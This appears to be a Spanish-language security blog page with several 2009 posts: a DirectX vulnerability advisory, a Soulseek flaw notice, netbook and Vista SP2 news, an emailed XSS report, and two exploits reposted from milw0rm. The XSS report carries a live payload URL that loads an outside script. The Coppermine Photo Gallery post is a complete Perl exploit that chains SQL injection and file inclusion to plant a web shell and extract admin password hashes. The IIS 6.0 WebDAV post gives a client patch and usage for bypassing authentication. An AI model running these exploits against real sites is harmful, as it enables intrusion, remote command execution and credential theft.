0 day en Microsoft DirectX

Microsoft ha reconocido en un aviso oficial una vulnerabilidad en DirectX sobre 2000, XP y 2003 que podría permitir a un atacante ejecutar código arbitrario. El fallo parece que se está aprovechando en estos momentos por atacantes, por lo que se convierte en un 0 day. Es explotable a través de archivos de QuickTime.

DirectX es una colección de APIs creadas para facilitar tareas relacionadas con la programación de juegos y multimedia en Windows. El kit de desarrollo de DirectX (SDK) y el EndUser Runtime se distribuyen gratuitamente por Microsoft y también adjunto a muchos programas que lo utilizan.

DirectX 7.x, 8.x y 9.x sobre Windows 2000, XP y 2003 sufre de una vulnerabilidad en la forma en la que DirectShow (en quartz.dll) maneja el formato QuickTime. Si la víctima abre un archivo QuickTime especialmente manipulado a través de cualquier vía (también a través el navegador), el atacante podría ejecutar código arbitrario con los permisos del usuario que ejecuta la aplicación.

Se recomienda tomar cualquiera de estas acciones:

a) Deshabilitar la interpretación de contenido QuickTime en quartz.dll borrando la rama HKEY_CLASSES_ROOT\CLSID\{D51BD5A0-7548-11CF-A520-0080C77EF58A} del registro.

b) Modificar la ACL de quartz.dll eliminando los permisos NTFS

c) Desregistrando la librería (Regsvr32.exe /u %WINDIR%\system32\quartz.dll)

Más Información:

Vulnerability in Microsoft DirectShow Could Allow Remote Code Execution
http://www.microsoft.com/technet/security/advisory/971778.mspx

Via hispasec

Lenovo saca al mercado la primer netbook con HD Video

Modelo: lenovo ideapad s12
Lenovo presenta la netbook capaz de reproducir HD video

Con su procesador Intel Atom N270 y el poderoso chip gráfico de Nvidia, esta netbook resalta entre las demás debido a su capacidad de reproducir videos HD.

Pantalla de 12 ", salida HDMI, teclado similar al de los equipos comunes.

El precio del nuevo netbook de Lenovo es, en su versión básica, de 449 dólares y 499 con HDMI y tarjeta Nvidia 9400.

Aquí en Mexico probablemente lleguen estos equipos en Julio o finales de Agosto, pero ya podemos ver como esas maquinitas van enriqueciendo sus funciones.

Consultar precios de laptops lenovo

Re: Formulario de Contacto (Aviso de XSS en Chili.com.mx)

Asunto: Re: Formulario de Contacto
Remitente: contacto
Destinatario: soporte@topmetroflog.site40.net
Fecha: 30.04.2009 14:05



Para proteger su privacidad, las imágenes externas han sido bloqueadas en este mensaje Mostrar imágenes
webmaster@chili.com.mx escribió:
Nombre: Soporte
EMAIL: soporte@topmetroflog.site40.net
Comentario: validen correctamente la busqueda porque es vulnerable a un ataque tipo xss.
Referer: http://www.chili.com.mx/search.php?q=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E&_b=Buscar



Gracias por el aviso, pense que por tener mod_security configurado con
muchas reglas estaba cubierto, pero se ve que no. Voy a ver como lo
arreglo.

--
*----------------------------*
* Gerardo Perosio *
* contacto en chili *
* contacto@chili.com.mx *
*----------------------------*

Hay que validar correctamente la entrada de la variable q del archivo search.php que mediante GET recibe los parámetros de búsqueda, una solución parcial para search.php?q= podría ser
- Utilizar datos de codificación para evitar la inyección directa de caracteres potencialmente maliciosos (por ejemplo, véase la función htmlspecialchars [inglés] en PHP);
O hacer una función de validación propia.

Saludos,

Windows Vista SP2 (Service Pack 2)

Actualización para el Sistema Operativo de Windows Vista (Service Pack 2)

Windows Vista Service Pack 2 (SP2) es el segundo pack de actualizaciones y mejoras para Windows Vista.

Windows Vista Service Pack 2 (SP2) incluye todas las actualizaciones de seguridad y correcciones que han ido saliendo hasta la fecha compiladas en un único instalable e incorpora de igual modo una serie de nuevas características.

Entre las mejoras de Windows Vista Service Pack 2 (SP2) se cuenta la compatibilidad con Bluetooth 2.1, la capacidad de grabación de discos Blu-ray, una mejor gestión de las conexiones WiFi o la última versión de Windows Search. Una de las mejoras más interesantes pero menos conocidas del Windows Vista Service Pack 2 (SP2) es que elimina el límite conexiones TCP/IP semi-abiertas, presente en todas las versiones anteriores.

Sistema operativo: Windows Vista Requisitos mínimos: - Windows Vista SP1

SP2 para Vista 32 bits (348 MB)
SP2 para Vista 64 bits (577 MB)

Grave fallo de seguridad en Soulseek

Se ha encontrado un problema de ejecución de código arbitrario en Soulseek que podría permitir a un atacante atacar a cualquier usuario conectado a la red. Se trata de una de las primeras vulnerabilidades graves y hechas públicas de este programa.

Soulseek es un programa de intercambio de ficheros a través de redes de pares. Fue fundado por un antiguo programador de Napster en 2000. Está especializado en intercambio de música, y entre sus virtudes está la gran cantidad de material de todo tipo accesible desde la red. Soulseek tomó el relevo de Audiogalaxy (sin duda el programa de intercambio con mayor cantidad y calidad de música).

Soulseek permite buscar ficheros de forma distribuida entre una persona, toda la comunidad que usa la aplicación, o en un canal IRC del programa. Así el usuario puede acotar su búsqueda de diferentes formas. El fallo es grave, puesto que permitiría que un atacante remoto realizase una supuesta búsqueda entre lo que comparte un usuario o incluso todo un canal IRC y ejecutar código en ellos. Todo usuario de Soulseek conectado resulta en una potencial víctima.

El fallo, encontrado por Laurent Gaffié se trata de un error de límites a la hora de procesar mensajes de búsqueda. Esto provoca un desbordamiento de memoria intermedia si se envía una cadena de búsqueda que contenga un parámetro demasiado largo. Se han hecho públicos todos los detalles de la vulnerabilidad y una prueba de concepto.

Soulseek no ha publicado parche. Se recomienda limitar el número de caracteres reservados a la búsqueda.

Soulseek * P2P Remote Distributed Search Code Execution
http://archives.neohapsis.com/archives/fulldisclosure/2009-05/0210.html

Coppermine Photo Gallery <= 1.4.22 Remote Exploit

#!/usr/bin/perl
# Coppermine Photo Gallery <= 1.4.22 Remote Exploit # Need register_globals = on and magic_quotes_gpc = off # Based on vulnerabilities discussed at http://www.milw0rm.org/exploits/8713 # Coded by girex use LWP::UserAgent; if(not defined $ARGV[0]) { banner(); print "[-] Usage: perl $0 [host] [path]\n"; print "[-] Example: perl $0 localhost /gallery/\n\n"; exit; } my $lwp = new LWP::UserAgent or die; my $target = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0]; $target .= $ARGV[1] unless not defined $ARGV[1]; $target .= '/' unless $target =~ /^http:\/\/(.?)\/$/; my $uid = '1'; # Change if need my @chars = ('1'..'9', 'a'..'f'); my $injection = '';

banner();
$lwp->default_header('Accept-Language: en-us,en;q=0.5');

my $html = inj_request(' WHERE x'); # Wrong query to obtain an error

if(not defined $html)
{
print "[-] Request mistake. Exploit terminated!\n";
exit ();
}
elsif($html =~ /There was an error while processing a database query/)
{
print "[+] Site vulnerable. Trying to retrieve absolute path...\n";
}
else
{
print "[-] Site not vulnerable to SQL Injection in thumbnails.php\n";
print "[-] Maybe magic_quotes = On or register_globals = Off\n";
end_try();
}

# This LFI includes README.txt that contais php code with phpinfo() function.
my $res = $lwp->get("${target}index.php?GLOBALS[USER][ID]=5b83a5f92603efcdb65d47c9a2991d6b&GLOBALS[USER][lang]=../README.txt");

if($res->content =~ /_SERVER\[\"SCRIPT_FILENAME\"\]<\/td>(.*)index\.php<\/td><\/tr>/)
{
$path_to = $1;
}
else
{
print "[-] Unable to retrieve the absolute path. Problems with LFI.\n";
end_try();
}

$html = inj_request("AND 1=2 UNION ALL SELECT '${injection}' INTO OUTFILE '${path_to}logs/log_db.inc.php");
my $res = $lwp->get($target.'logs/log_db.inc.php');

if($res->is_success)
{
print "[+] Shell injected at ${path_to}logs/log_db.inc.php\n\n";
}
else
{
print "[-] Shell upload failed, MySQL cannot write to logs path!\n\n";
print "[+] Attempting to retrieve admin's md5..\n";
blind_sql();

if(length($hash) != 32)
{
print "\n\n[-] Exploit mistake: unable to retrieve admin's md5\n";
}
else
{
print "\n";
}

end_try();
}

while(1)
{
print "[+] coppermine\@shell:~\$ ";
chomp(my $cmd = );

end_try() if $cmd eq 'exit';

$lwp->default_header( 'CMD' => $cmd );
my $res = $lwp->get($target.'logs/log_db.inc.php');

if($res->is_success and $res->content =~ /12345/)
{
print "\n". substr($res->content, index($res->content, '12345') + 5)."\n";
}
else
{
print "[-] Something wrong, command execution failed!\n";
last;
}
}




sub inj_request
{
my $sql = shift;
my $res = $lwp->get($target. "thumbnails.php?lang=english&album=alpha&GLOBALS[cat]=999'+${sql}");

if($res->is_success)
{
return $res->content;
}

return undef;
}

sub blind_sql
{
our $hash = '';
my $prefix = get_prefix() or 'cpg14x';
my $username = get_username() or 'admin';

$| = 1;
print "[+] username: ${username} - md5 hash: ";

for($i = 1; $i <= 32; $i++) { foreach $char(@chars) { $html = inj_request("OR+SUBSTRING((SELECT+user_password+FROM+${prefix}_users+WHERE+user_id=${uid}),${i},1)='${char}'%23"); if($html =~ /The selected album\/file does not exist/) { $hash .= $char; syswrite(STDOUT, $char, 1); last; } } last if $i != length($hash); } } sub get_prefix # File update.php shows the query executed to update the tables, we can get table prefix from it { my $rv = undef; my $res = $lwp->get($target.'update.php');

if($res->is_success and $res->content =~ /CREATE TABLE IF NOT EXISTS (\w+)_sessions/)
{
$rv = $1;
}

return $rv;
}

sub get_username
{
my $rv = undef;
my $res = $lwp->get($target."profile.php?lang=english&uid=${uid}");

if($res->content =~ /(.*)'s profile<\/td>/)
{
$rv = $1;
}

return $rv;
}

sub end_try
{
my $res = $lwp->get($target.'register.php?lang=english');

if($res->is_success and $res->content !~ /You don't have permission to access this page/)
{
print "\n[+] Target can be vulnerable to SQL Injection for registered users\n";
print "[+] See http://www.milw0rm.org/exploits/8713 to know how to exploit it!\n\n";
}
else
{
print "\n[-] The target is NOT vulnerable to the SQL Injection for registered users\n\n";
}

exit;
}

sub banner
{
print "\n[+] Coppermine Photo Gallery <= 1.4.22 Remote Exploit\n";
print "[+] Coded by girex\n";
print "\n";
}

# milw0rm.com [2009-05-19]

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)

# Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# --snip--
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# --snip--
# > tar xzvf cadaver-0.23.2.tar.gz
# --snip--
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch # patching file lib/neon/ne_basic.c # patching file lib/neon/ne_request.c # patching file lib/neon/ne_uri.c # > ./configure
# --snip--
# > make
# --snip--
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/': succeeded.
# password.txt 7 May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt':
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
--- cadaver-0.23.2/lib/neon/ne_basic.c 2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c 2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
value = "infinity";
break;
}
- ne_add_request_header(req, "Depth", value);
+ ne_add_request_header(req, "Depth", "1");
}

static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
--- cadaver-0.23.2/lib/neon/ne_request.c 2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c 2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
"Connection: TE" EOL
"TE: trailers" EOL);
}
+ ne_buffer_czappend(req->headers, "Translate: f" EOL);
}

int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
const char *method, const char *path)
{
+ char *path2 = ne_calloc(strlen(path)+7);
ne_request *req = ne_calloc(sizeof *req);

req->session = sess;
@@ -435,13 +437,18 @@
req->method = ne_strdup(method);
req->method_is_head = (strcmp(method, "HEAD") == 0);

+ if(strlen(path)>2)
+ sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+ else
+ path2 = path;
+
/* Only use an absoluteURI here when absolutely necessary: some
* servers can't parse them. */
- if (req->session->use_proxy && !req->session->use_ssl && path[0] == '/')
+ if (req->session->use_proxy && !req->session->use_ssl && path2[0] == '/')
req->uri = ne_concat(req->session->scheme, "://",
- req->session->server.hostport, path, NULL);
+ req->session->server.hostport, path2, NULL);
else
- req->uri = ne_strdup(path);
+ req->uri = ne_strdup(path2);

{
struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
--- cadaver-0.23.2/lib/neon/ne_uri.c 2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c 2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX x0 x2 x4 x6 x8 xA xC xE */
/* 0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/* 1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/* 2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/* 2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/* 3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/* 4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/* 5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,

# milw0rm.com [2009-05-21]